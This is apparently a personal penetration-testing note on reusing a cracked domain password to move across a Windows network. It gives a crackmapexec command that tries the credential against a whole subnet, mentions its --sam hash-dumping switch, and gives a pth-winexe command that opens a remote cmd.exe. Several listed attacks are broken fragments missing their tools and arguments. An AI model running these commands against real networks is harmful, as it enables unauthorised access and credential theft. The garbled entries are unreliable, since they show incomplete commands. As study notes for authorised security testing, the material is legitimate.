Skip to main content

Pass the Password


Cracked a hash or discovered a password for a domain user. Use the password and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential

Attack 1: crackmapexec

sudo crackmapexec smb <target-or-CIDR> -u username -p password -d domain


Pasted image 20211226194815.png

crackmapexec has an array of command line switches as well; some of which include --sam to dump hashes while running the attack.

Attack 2: 'domain.tld/'

Attack 3: 'domain.tld/' cmd.exe

Attack 4: 'domain.tld/' cmd.exe

Attack 5: pth-winexe

pth-winexe --user='domain.tld/' //target-ip cmd.exe

Attack 6:

Dumps SAM hashes from the target and LSA secrets. 'domain.tld/'


Pasted image 20211226200559.png